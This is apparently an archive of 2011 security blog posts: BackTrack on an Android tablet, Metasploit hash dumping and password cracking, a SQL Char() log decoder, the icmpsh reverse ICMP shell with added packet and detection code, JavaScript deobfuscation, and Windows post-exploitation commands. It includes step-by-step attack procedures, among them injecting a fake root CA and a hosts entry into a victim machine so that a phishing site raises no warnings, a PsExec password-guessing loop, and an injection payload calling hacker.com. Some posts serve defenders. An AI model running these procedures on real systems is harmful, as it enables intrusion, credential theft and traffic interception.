Oct 1, 2011

Howto: Install Backtrack 5 On Samsung Galaxy Tab 10.1 [P7500]

Do all of these steps at your own risk!

1. Download the rooting file and transfer it to the tab
    - http://forum.xda-developers.com/attachment.php?attachmentid=593613&d=1305168395

2. Reboot into recovery mode: hold the Power button and Volume Down until two icons appear, press Volume Down to select the recovery icon, then press Volume Up (or Power) to enter recovery mode.

3. Choose "apply update from sdcard" and select the rooting file.

After this step your tab is rooted.

4. Download the required files
   -  P7500DXKH4_P7500OLBKH1_P7500XWKG1_HOME.tar.MD5  http://www.megaupload.com/?d=S6HSZL8H
   -  001001-P7500_KI1_Restock.zip  http://www.multiupload.com/5RMKLEFCTA
   -  001003-Overcome_10.1_Series_v1.1.0_P7500_Full.zip  http://www.multiupload.com/CRBRV18830
   -  002001-Overcome_CWM_Recovery_v4.1.1.5.tar  http://www.multiupload.com/REAMDK5J7U
   -   Overclock Kernel http://droidbasement.com/galaxy/kernels/2636/20/p4-ux/boot-cm_2636.4_p4_ux-oc-xtra-vfpv3-d16_fp-091311.zip

*** You can replace Overcome_10.1_Series_v1.1.0_P7500_Full.zip with another custom ROM, such as Starburt.

5. Extract 001001-P7500_KI1_Restock.zip.

6. Reboot into download mode: hold the Power button and Volume Down until the two icons appear, then press Volume Up (or Power) to enter download mode.

7. Open Odin3 v1.85, click PDA, select P7500OXAKI1_P7500XXKI1_P7500XXKI1_HOME.tar.MD5 and click Start.

The tab restarts when this step finishes.

8. Copy Overcome_10.1_Series_v1.1.0_P7500_Full.zip and boot-cm_2636.4_p4_ux-oc-xtra-vfpv3-d16_fp-091311.zip to the tab.

9. Enter download mode again.

10. In Odin, click PDA, select Overcome_CWM_Recovery_v4.1.1.5.tar and click Start.

11. Enter recovery mode.

12. In the install menu choose "choose zip from internal storage with data wipe" and select Overcome_10.1_Series_v1.1.0_P7500_Full.zip; then go back to the install menu, choose "choose zip from internal storage" and select boot-cm_2636.4_p4_ux-oc-xtra-vfpv3-d16_fp-091311.zip.

13. You now have root and the new custom ROM. Install the Android SDK and download the BackTrack 5 ARM image.
   - Android SDK http://developer.android.com/sdk/index.html#top
   - Backtrack 5 ARM http://www.backtrack-linux.org/downloads/

14. Copy the BackTrack files to the tab, or use adb to install busybox and push them from the PC:
   - Go to C:\Program Files\Android\android-sdk\platform-tools
   - adb.exe shell
   - mkdir /sdcard/BT5
   - exit
   - adb.exe push busybox /sdcard/
   - adb.exe push installbusybox.sh /sdcard/
   - adb.exe push fsrw /sdcard/BT5/
   - adb.exe push mountonly /sdcard/BT5/
   - adb.exe push bootbt /sdcard/BT5/
   - adb.exe push bt5.img.gz /sdcard/BT5/
   - adb.exe push unionfs /sdcard/BT5/

*** Alternatively, use SSHDroid to run an SSH server on the tab. [Default SSH user: root, password: admin; change that password before you leave sshd running on a shared network.]

15. Open a terminal on the tab with ConnectBot and choose "local" to connect to the tab itself. I don't know whether you can use sshd to complete this step, but you can try it for easier typing.

16. Disconnect the tab from the PC.

17. Go to /sdcard/BT5 and decompress bt5.img.gz
   - cd /sdcard/BT5
   - gunzip bt5.img.gz

18. Start BT5
   - sh bootbt

19. You are now inside the BackTrack 5 chroot:

   net.ipv4.ip_forward = 1
   root@localhost:/# ls /pentest/
   backdoors  database     exploits   passwords  scanners  stressing  voip
   cisco      enumeration  forensics  python     sniffers  tunneling  web

20. Run startvnc
  - startvnc

*** You can change the VNC resolution by editing /usr/bin/startvnc with nano.

21. VNC is now running; check which port it listens on with
  - netstat -napt

22. Now connect to the VNC server with androidVNC or any other VNC client from the Android Market.

*** The default VNC password is "toortoor". The server is reachable over the network, not only from the tab itself, so change the password before you take the tab onto an untrusted network.

23. Finally you can do anything you can do in BackTrack 5, on your tab. Have a nice hack :)

   - http://www.droidsans.com/node/31129
   - http://pauldotcom.com/2011/05/backtrack-5-install-on-samsung.html

If you like my blog, Please Donate Me

Howto: Windows Post Exploitation With John The Ripper In Metasploit 4 Or Ophcrack

This post shows how to recover the passwords once we are inside the victim machine.

1. Exploit the victim with Metasploit.

2. After getting a meterpreter shell, run post/windows/gather/hashdump to dump the password hashes (reading the SAM needs SYSTEM privileges; run getsystem first if you do not have them).
  - meterpreter > run post/windows/gather/hashdump

3. The hashes are now stored in the Metasploit database; send the meterpreter session to the background.
  - meterpreter > background 

4. Use the John the Ripper module to crack them.
   - msf > use auxiliary/analyze/jtr_crack_fast
   - msf auxiliary(jtr_crack_fast) > run

5. List the credentials to see the results.
   - msf auxiliary(jtr_crack_fast) > creds

6. If you prefer ophcrack, save the hash list (it is already in pwdump format) to a file [in this post: hashdump] and run this command in the ophcrack folder
  - ophcrack-cli -d rainbowtables/ -t special,0,3:tables_xp_free_fast,0,3 -f hashdump

Source: http://www.securityartwork.es/2011/09/30/post-explotacion-con-john-the-ripper-y-ophcrack/ 

Sep 30, 2011

Add BackTrack Tools Into Ubuntu 11.04

1. Add the GPG key of the new repository
wget -q http://all.repository.backtrack-linux.org/backtrack.gpg -O- | sudo apt-key add -

2. Add the BackTrack 5 repositories to the list
   - sudo vim /etc/apt/sources.list
   deb http://all.repository.backtrack-linux.org revolution main microverse non-free testing
   deb http://32.repository.backtrack-linux.org revolution main microverse non-free testing
   deb http://source.repository.backtrack-linux.org revolution main microverse non-free testing

3. Update the apt package list.
   - sudo apt-get update

4. Install what you want with sudo apt-get install <package>. The BackTrack repository carries its own builds of some packages Ubuntu already ships, so read the list of packages apt proposes to replace before confirming an install or upgrade.

Sep 29, 2011

Decoding MySQL Char() to ASCII With a Shell Script

When doing forensics on website logs, I found that many attacks use char() to evade detection and to make the malicious code hard to read. So I wrote this simple script to decode every char() in a log file into ASCII characters for human reading.

./decoding_char_sql.sh logfiles.log

Example logfiles.log:

target.com/testing.php?vulnparam=1000'+update+tablenames+set+value=cast(value+as+varchar(8000))Char(60),Char(105),Char(109),Char(103),Char(32),Char(115),Char(114),Char(99),Char(61),Char(104),Char(116),Char(116),Char(112),Char(58),Char(47),Char(47),Char(104),Char(97),Char(99),Char(107),Char(101),Char(114),Char(46),Char(99),Char(111),Char(109),Char(63),Char(109),Char(97),Char(108),Char(105),Char(99),Char(105),Char(111),Char(117),Char(115),Char(46),Char(106),Char(115),Char(62),Char(60),Char(47),Char(105),Char(109),Char(103),Char(62)+as+varchar(8000))-- 80 - Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:1.4)+Gecko/20780624+Netscape/7.1+(ax) 200 0 0

Decoding to:
target.com/testing.php?vulnparam=1000'+update+tablenames+set+value=cast(value+as+varchar(8000))<img src=http://hacker.com?malicious.js></img>+as+varchar(8000))-- 80 - Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:1.4)+Gecko/20780624+Netscape/7.1+(ax) 200 0 0

Please download this script from: http://www.wupload.com/file/223792731/decoding_char_sql.sh
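The shell script itself is only available from the download link above. As an added example that is not the post's script, here is a Python decoder for the same job that also handles the two other spellings found in logs: MySQL's multi-argument CHAR(115,101,108) and the T-SQL char(60)+char(47) concatenation. It leaves varchar(8000) alone (there must be a word boundary before char), leaves any value above 255 untouched, and is checked against the log line from this post.

```python
"""Decode SQL Char()/CHAR() sequences in web-server logs back to readable text."""
import re
import sys

# One call: T-SQL style Char(60) or MySQL style CHAR(60,105,109). The lookbehind
# stops "varchar(8000)" from matching as "char(8000)".
_CALL = r"(?<![A-Za-z0-9_])char\(\s*\d+(?:\s*,\s*\d+)*\s*\)"
# A run of calls joined by ',' or '+' (how the injected string is concatenated).
# The trailing separator is deliberately not consumed, so "Char(62)+as+varchar"
# decodes to ">+as+varchar" exactly as in the post.
_RUN = re.compile(rf"{_CALL}(?:\s*[,+]\s*{_CALL})*", re.IGNORECASE)


def _decode_run(match: "re.Match[str]") -> str:
    """Turn every number inside a matched run into its character."""
    run = match.group(0)
    codes = [int(n) for n in re.findall(r"\d+", run)]
    if any(c > 255 for c in codes):      # not byte values: leave the run as it was
        return run
    return "".join(chr(c) for c in codes)


def decode_char(text: str) -> str:
    """Decode all Char()/CHAR() runs in one log line (or any string)."""
    return _RUN.sub(_decode_run, text)


def decode_file(path: str):
    """Yield each line of a log file with its Char() runs decoded."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        for line in fh:
            yield decode_char(line.rstrip("\n"))


# The log line from the post above (mass-SQL-injection style, one Char() per byte).
SAMPLE_LOG = (
    "target.com/testing.php?vulnparam=1000'+update+tablenames+set+value=cast(value+as+varchar(8000))"
    "Char(60),Char(105),Char(109),Char(103),Char(32),Char(115),Char(114),Char(99),Char(61),Char(104),"
    "Char(116),Char(116),Char(112),Char(58),Char(47),Char(47),Char(104),Char(97),Char(99),Char(107),"
    "Char(101),Char(114),Char(46),Char(99),Char(111),Char(109),Char(63),Char(109),Char(97),Char(108),"
    "Char(105),Char(99),Char(105),Char(111),Char(117),Char(115),Char(46),Char(106),Char(115),Char(62),"
    "Char(60),Char(47),Char(105),Char(109),Char(103),Char(62)+as+varchar(8000))-- 80 - "
    "Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:1.4)+Gecko/20780624+Netscape/7.1+(ax) 200 0 0"
)

if __name__ == "__main__":
    # Same usage as the shell script: python3 decoding_char_sql.py logfiles.log
    lines = decode_file(sys.argv[1]) if len(sys.argv) > 1 else [decode_char(SAMPLE_LOG)]
    for decoded in lines:
        print(decoded)
```

Run it over a log and grep the output for "<script", "<iframe" or "<img src=http" to find the injected payloads that the encoded form hid from a plain text search.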

Sep 28, 2011

ICMP Shell

icmpsh - simple reverse ICMP shell

icmpsh is a simple reverse ICMP shell with a win32 slave and a POSIX-compatible master in C, Perl or Python.

--- Running the Master ---

The master is straightforward to use. The C version needs no extra libraries.
The Perl master, however, has the following dependencies:

 * IO::Socket
 * NetPacket::IP
 * NetPacket::ICMP

When running the master, don't forget to disable the OS's own ICMP echo replies. For example:

 sysctl -w net.ipv4.icmp_echo_ignore_all=1

If you skip that, you will still receive information from the slave, but the slave is unlikely to receive the
commands sent from the master, because the kernel answers the slave's echo requests itself.

--- Running the Slave ---

The slave comes with a few command line options as outlined below:

-t host            host IP address to send ping requests to. This option is mandatory!

-r                 send a single test ICMP request containing the string "Test1234" and then quit.
                   This is for testing the connection.

-d milliseconds    delay between requests in milliseconds 

-o milliseconds    timeout for responses in milliseconds. If a response has not been received in time,
                   the slave increments a counter of blanks. If that counter reaches the limit, the slave quits.
                   The counter is reset to 0 when a response is received.

-b num             limit of blanks (unanswered ICMP requests) before quitting

-s bytes           maximum data buffer size in bytes

To improve speed, lower the delay (-d) between requests or increase the size (-s) of the data buffer.

Source: https://github.com/inquisb/icmpsh
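To see what the master and slave actually put on the wire, here is an added example (my own code, not icmpsh's): it builds and parses ICMP echo packets with a correct RFC 1071 checksum, walks one icmpsh-style round trip in which the slave's echo request carries command output and the master's echo reply with the same id/seq carries the next command, and applies a defender's heuristic that separates such payloads from stock ping payloads. The stock-ping patterns (the 32-byte Windows alphabet and the iputils timestamp followed by 0x10, 0x11, ... filler) are assumptions from observed traffic, not taken from icmpsh, and the exchange is simulated in memory rather than sent through a raw socket.

```python
"""ICMP echo packets as an ICMP tunnel uses them, plus a stock-ping heuristic."""
import struct

ECHO_REPLY, ECHO_REQUEST = 0, 8
# Assumed default payload of the Windows ping client (heuristic, not from icmpsh).
WINDOWS_PING_DATA = b"abcdefghijklmnopqrstuvwabcdefghi"


def checksum(data: bytes) -> int:
    """RFC 1071 ones'-complement sum over 16-bit words; an odd tail byte is zero-padded."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                       # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_echo(icmp_type: int, ident: int, seq: int, payload: bytes) -> bytes:
    """ICMP header (type, code 0, checksum, id, seq) followed by the payload."""
    header = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    csum = checksum(header + payload)        # computed with the checksum field zeroed
    return struct.pack("!BBHHH", icmp_type, 0, csum, ident, seq) + payload


def parse_echo(packet: bytes) -> dict:
    """Validate the checksum and split the header fields from the data."""
    if len(packet) < 8:
        raise ValueError("short ICMP packet")
    icmp_type, code, _csum, ident, seq = struct.unpack("!BBHHH", packet[:8])
    if checksum(packet) != 0:                # a valid packet sums to 0xFFFF -> complement 0
        raise ValueError("bad ICMP checksum")
    return {"type": icmp_type, "code": code, "id": ident, "seq": seq, "data": packet[8:]}


def looks_like_stock_ping(payload: bytes) -> bool:
    """True for the Windows default payload or the iputils layout: 16 bytes of
    timestamp followed by the filler bytes 0x10, 0x11, 0x12, ... (assumed patterns)."""
    if payload == WINDOWS_PING_DATA:
        return True
    if 24 <= len(payload) <= 255 and payload[16:] == bytes(range(0x10, 0x10 + len(payload) - 16)):
        return True
    return False


def tunnel_exchange(ident: int, seq: int, slave_output: bytes, master_command: bytes):
    """One icmpsh-style round trip, simulated in memory: the slave's echo request
    carries output, the master's echo reply (same id/seq) carries the next command.
    Returns (output seen by master, command seen by slave, request looked like ping)."""
    request = build_echo(ECHO_REQUEST, ident, seq, slave_output)
    seen_by_master = parse_echo(request)
    reply = build_echo(ECHO_REPLY, seen_by_master["id"], seen_by_master["seq"], master_command)
    seen_by_slave = parse_echo(reply)
    return seen_by_master["data"], seen_by_slave["data"], looks_like_stock_ping(seen_by_master["data"])


if __name__ == "__main__":
    out, cmd, stock = tunnel_exchange(0x1234, 1, b"C:\\Windows\\system32>", b"whoami\r\n")
    print("master got:", out, "| slave got:", cmd, "| stock ping payload:", stock)
```

The sysctl above matters because of the id/seq pairing: the kernel's own echo reply to the slave's request carries the same id/seq and echoes the request data back, so whichever reply arrives first is what the slave treats as the master's command. For detection, echo payloads that fail looks_like_stock_ping and contain printable shell text are a strong tunnel indicator.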

iScanner - Tool to detect and remove malicious code from web pages

iScanner is a free open source tool that lets you detect and remove malicious code and web page malware from your website easily and automatically. iScanner not only shows you the infected files on your server but can also clean them by removing ONLY the malware code from the infected files.
Current Features:
  • Ability to scan one file, directory or remote web page / website.
  • Detect and remove website malware and malicious code in web pages. This includes hidden iframe tags, JavaScript, VBScript, ActiveX objects, suspicious PHP code and some known malware.
  • Extensive log shows the infected files and the malicious code.
  • Support for sending email reports.
  • Ability to clean the infected web pages automatically.
  • Easy backup and restore system for the infected files.
  • Simple and editable signature based database.
  • You can easily send a malicious file to the iScanner developers for analysis.
  • Ability to update the database and the program easily from iScanner's server.
  • Very flexible options and easy to use.
  • Fast scanner with great performance.
  • Yes, it's FREE!!
Source: http://thehackernews.com/2011/09/iscanner-tool-to-detect-and-remove.html

JavaScript Deobfuscation Tricks And Tools

     Normal Trick:
      1. Assign eval to a variable
        From: eval(code…);
        To: var x = eval(code…); document.write(x);

      2. Replace document.write() with alert()
        From: document.write(code…);
        To: alert(code…);

      3. Replace eval() with document.write()
        From: eval(code…);
        To: document.write(code…);

      4. Wrap code with alert()
        From: (window['code...
        To: alert((window['code...

      5. Surround output with textarea
        From: <script>code...</script>
        To: <script>document.write("<textarea cols=50 rows=50>");code...;document.write("</textarea>")</script>

This script looks for the DIV container which is up at the top and attaches HTML code to it. Here's the offending code:
document.getElementById("pdfplace").innerHTML = "<object width='0' height='0' frameborder='0' type='application/pdf' data='exp/pdf.php?user=admin&pdf_acces=on'><param name='src' value='1.pdf'>";
To get around this, here's what you can do. Replace this tag:
<div id="pdfplace"></div>
With this:

<textarea id="pdfplace" cols=50 rows=10></textarea>

And here is the result:

Source: http://www.kahusecurity.com/2010/deobfuscating-tricks/

    For Google Chrome:
      1. Right Click -> Choose "Inspect Element"
      2. Go to Scripts Tab
      3. Right Click -> De-obfuscate Source

    Online Tools
    - Beautify Javascript http://jsbeautifier.org/
    - Firefox add-on: JavaScript Deobfuscator https://addons.mozilla.org/en-US/firefox/addon/javascript-deobfuscator/
    - JavaScript Formatter http://www.blackbeltcoder.com/Resources/JSFormatter.aspx
    - JavaScript Formatter http://javascript.about.com/library/blformat.htm
    - JavaScript Compressor http://dean.edwards.name/packer/
    - JavaScript Decompressor http://dean.edwards.name/unpacker/
    - Javascript Beautifier / Decryption / Unpacker http://www.bin2hex.com/javascript_beautify_decryption_deobfuscate.html

Extra: Shellcode to exe http://sandsprite.com/shellcode_2_exe.php

Sep 25, 2011

Howto: Metasploit Post Exploitation With Inject CA

1. Create the certificate with the impersonation-ssl module.
 you can download the module from http://blog.c22.cc/2011/09/04/ssl-certificate-impersonation-for-shits-and-giggles/

2. Set up a phishing site that serves the fake SSL certificate.

3. Get the injection module from https://dev.metasploit.com/redmine/issues/5503

4. Exploit the victim with Metasploit.

5. When you get the meterpreter shell, inject the fake CA into the victim's trusted root store. Either configure the module from the console:

  meterpreter > background
  msf > use auxiliary/windows/ca/myca
  msf auxiliary(myca) > set COMMAND inject_ca
  msf auxiliary(myca) > set CAFILE /root/.msf4/loot/yourfakekey.pem
  msf auxiliary(myca) > run

  or run it in one line from the meterpreter prompt:

  meterpreter > run post/windows/manage/myca COMMAND=inject_ca CAFILE=/root/.msf4/loot/yourfakekey.pem

6. Point the hostname at your phishing site by adding an entry to C:\Windows\System32\drivers\etc\hosts (you can also edit the file from a shell):

  meterpreter > run post/windows/manage/myca COMMAND=inject_host IP= DOMAIN=mail.google.com

With the fake CA trusted and the hosts entry in place, the victim's browser shows no certificate warning when it opens the phishing site.

Twitter’s t.co URL spoofing.

If you want the detail, please go to the Source.

So after reading the Source, I tried to spoof it myself:

Normal Link:

Target Link:

Spoofed Link:

Now when I browse to the spoofed link, I end up at the target link.

Source: http://blog.12k.nl/post/10604842941/twitters-t-co-url-spoofing

Howto: Command For Information Gathering Of Windows Post Exploitation

If you want to see all the commands and the output of each one, please go to the Source.

Gathering system-related information

Running Services

C:\>tasklist /svc 

Installed Services

C:\>sc query state= all

Current environment settings

Find Username

C:\>set | find "USERNAME"

Find Domain

C:\>set | find "USERDOMAIN"

Find Current User Information

C:\>net user John 

Find Users with Administrator Privileges in the current machine

C:\>net localgroup Administrators 

Password Guessing with PsExec

Username: Jack, Computer Name: XP-INTRANET, Password List: PassList.txt

C:\DOCUME~1\John>FOR /f %i in (PassList.txt) do @echo %i & @psexec /accepteula \\XP-INTRANET -u Jack -p %i "ipconfig" 2>nul && echo ***************** %i *****************

Extract Hashes from the sam and system file with samdump2

root@bt:~# samdump2 sam system >hashes.txt

Password cracking with John the Ripper using a wordlist

root@bt:/pentest/passwords/john# ./john --format=nt --wordlist=/root/Dicts/john.txt --rules /root/hashes.txt

Gather DNS Information

C:\>ipconfig /displaydns

OS Information

C:\>wmic /node: /user:IWAM_NETASPS /password:$ecretP4$$ os get name,servicepackmajorversion 

Installed Software

C:\>wmic /node: /user:IWAM_NETASPS /password:$ecretP4$$ product get name,version

Running Process

C:\>wmic /node: /user:IWAM_NETASPS /password:$ecretP4$$ process list brief

Local Drives Info

C:\>wmic /node: /user:IWAM_NETASPS /password:$ecretP4$$ logicaldisk get 

Shares Info

C:\>wmic /node: /user:IWAM_NETASPS /password:$ecretP4$$ share list /format:table

Network Info

C:\>wmic /node: /user:IWAM_NETASPS /password:$ecretP4$$ nicconfig get 

List Services Information

C:\>wmic /node: /user:IWAM_NETASPS /password:$ecretP4$$ service get /format:list

Find a specific Service State

C:\>wmic /node: /user:IWAM_NETASPS /password:$ecretP4$$ service where DisplayName="Telnet" GET 

Change start mode of service to automatically start upon boot

C:\>wmic /node: /user:IWAM_NETASPS /password:$ecretP4$$ service where DisplayName="Telnet" CALL 

Starting telnet service

C:\>wmic /node: /user:IWAM_NETASPS /password:$ecretP4$$ service where DisplayName="Telnet" CALL

Ping Sweep

C:\>FOR /L %i in (1,1,255) do @ping -n 1 192.168.168.%i | find "Reply"

Source: http://www.ikuppu.com/2011/09/windows-post-exploitation.html
